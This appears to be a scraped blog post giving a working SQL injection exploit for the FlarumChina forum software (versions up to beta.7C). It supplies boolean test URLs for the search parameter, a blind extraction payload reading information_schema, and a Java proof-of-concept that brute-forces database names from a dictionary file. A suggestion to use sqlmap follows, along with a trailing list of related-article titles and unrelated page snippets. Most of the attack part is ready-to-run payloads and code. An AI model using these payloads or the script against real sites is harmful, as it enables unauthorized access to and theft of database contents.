First,We need to download our vulnerable program in GitHub

links:https://github.com/skywalker512/FlarumChina/

Vulnerable versions: <= FlarumChina-beta.7C

When the build is completed, the following image will be displayed

So,The SQL Injection Vulnerability in Search Engine

You just need to visit the following links to make your judgment:

(1).http://127.0.0.1/?q=1%' and 1=1 --+

(2).http://127.0.0.1/?q=1%' and 1=2 --+

So, by returning the different pages mentioned above, we can see that there is a SQL injection vulnerability in this place.

Of course, I also wrote a script in Java to get the database name.

Although not perfect.

Principle:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

This link is returned when the page is normal.

So use this link to judge in my Java program

Java Poc:

 import java.io.BufferedReader;

 import java.io.FileReader;

 import java.io.IOException;

 import java.io.InputStreamReader;

 import java.net.MalformedURLException;

 import java.net.URL;

 import java.net.URLConnection;

 public class work {

     public static void main(String[] args) throws IOException {

         BufferedReader in = null;

         URL url = null;

         String str = null;

         for(int j=0;j<6;j++) {

             String bm=String.valueOf(j);

             System.out.print(bm+":");

             for (int i=1;i<25;i++) {

                 String cs=String.valueOf(i);

                 in = new BufferedReader(new FileReader("C:\\Users\\DELL\\Desktop\\superdic.txt"));

                 while((str = in.readLine()) != null) {

                     String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20"+bm+",1),"+cs+",1)='"+str+"'%20--+";

                     try {

                         url = new URL(urlPath);

                     } catch (MalformedURLException e) {

                         System.out.println("error:"+cs);

                     }

                     URLConnection conn = url.openConnection();

                     conn.setDoInput(true);

                     BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));

                     StringBuilder sb = new StringBuilder();

                     String line = null;

                     while((line = br.readLine()) != null) {

                         sb.append(line);

                     }

                     if(sb.indexOf("http://localhost/d/2") != -1) {

                         if("+".equals(str)) {

                             break;

                         }

                         System.out.print(str);

                         break;

                     }

                 }

                 if("+".equals(str)) {

                     break;

                 }

             }

             System.out.print("\n");

         }

         in.close();

     }

 }

Because I don't know how many databases there are, I'm going to run six for loops for the time being.

So the fifth line returned by the script does not have any output.

You can also use sqlmap directly to obtain of data.

Database:

But most websites are delayed, so script testing is recommended.

FlarumChina SQL injection Vulnerability的更多相关文章

  1. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. haar特征(转)

    转载链接:http://blog.csdn.net/lanxuecc/article/details/52222369 Haar特征 Haar特征原理综述 Haar特征是一种反映图像的灰度变化的,像素 ...

  2. 董事局主席董事长总裁首席执行官CEO总裁董事监事区别

    董事长是公司的最大股东:董事长是董事会的主席,一般是企业的所有者,掌握企业的股权并且决定企业的发展策略. 董事局主席通常是在大财团中才会出现,董事局主席管数个董事长,一个大财团涉及很多方面的业务,因此 ...

  3. 【转】C/C++内存泄漏及检测

    “该死系统存在内存泄漏问题”,项目中由于各方面因素,总是有人抱怨存在内存泄漏,系统长时间运行之后,可用内存越来越少,甚至导致了某些服务失败.内存泄漏是最难发现的常见错误之一,因为除非用完内存或调用ma ...

  4. 关于Mybatis的SQL映射文件中in关键字的用法

    有一个需求是可以选择多个设备进行删除,于是想到将多个设备id拼成字符串作为参数,以逗号隔开,如:"123,234,456". SQL如下: <delete id=" ...

  5. JSON和JSONP详解

    什么是JSON JSON是一种基于文本的数据交换方式,或者叫做数据描述格式,你是否该选用他首先肯定要关注它所拥有的优点. JSON的优点: 1.基于纯文本,跨平台传递极其简单: 2.Javascrip ...

  6. Android网络通信(8):WiFi Direct

    Android网络通信之WiFi Direct 使用Wi-Fi Direct技术可以让具备硬件支持的设备在没有中间接入点的情况下进行直接互联.Android 4.0(API版本14)及以后的系统都提供 ...

  7. mysql语句判断是否存在记录,没有则插入新纪录否则不执行

    1 前言 由于项目需要,当某个表如果有记录,就不执行加入语句,否则加入新纪录(测试数据).思路是:判断表的记录是否为空,然后再决定是否插入 2 代码 DROP PROCEDURE IF EXISTS ...

  8. php高级工程师面试题,行不行对照看下自己的实力

    在网上看到一些高级php 的面试题目.. 最近接连面试了几家公司,有些重要问题记录一下,督促自己学习提高,同时希望给朋友们一些帮助.内容很多,一点点完善,一步步学习..有些是面试被问,有些是招聘要求, ...

  9. zoj3469 区间dp好题

    /* 按坐标排序 以餐厅为起点向两边扩展区间 dp[i][j][0]表示送完区间[i,j]的饭后停留在左边的代价 dp[i][j][1]表示送完区间[i,j]的饭后停留在右边的代价 */ #inclu ...

  10. 多版本并发控制(MVCC)

    可以认为MVCC是行级锁的一个变种,但是它在很多情况下避免了加锁操作,因此开销更低. 虽然实现机制有所不同,但大都实现了非阻塞的读操作,写操作也只锁定必要的行. MVCC的实现是通过保存数据在某个时间 ...